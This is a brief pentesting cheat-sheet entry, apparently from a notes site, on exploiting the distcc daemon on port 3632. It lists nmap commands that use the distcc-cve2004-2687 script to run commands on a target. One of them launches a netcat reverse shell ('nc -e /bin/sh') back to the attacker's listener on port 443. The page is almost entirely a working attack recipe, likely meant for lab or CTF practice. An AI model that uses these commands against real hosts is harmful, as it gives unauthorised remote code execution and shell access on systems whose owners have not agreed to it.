DISTCCD - 3632
if this port is open use the following nmap script to find if it is exploitable and if you can execute system commandscheck for ncat or bash/python to then execute a callback command to your listener
NMAP
ls /usr/share/nmap/scripts/ | grep DISTCCD
nmap -p 3632 10.10.10.33 –script distcc-cve2004-2687 –script-args="cmd='id'"
nmap -p 3632 10.10.10.33 –script distcc-cve2004-2687 –script-args="cmd='nc -e /bin/sh 10.10.4.10 443'"
Last updated
Was this helpful?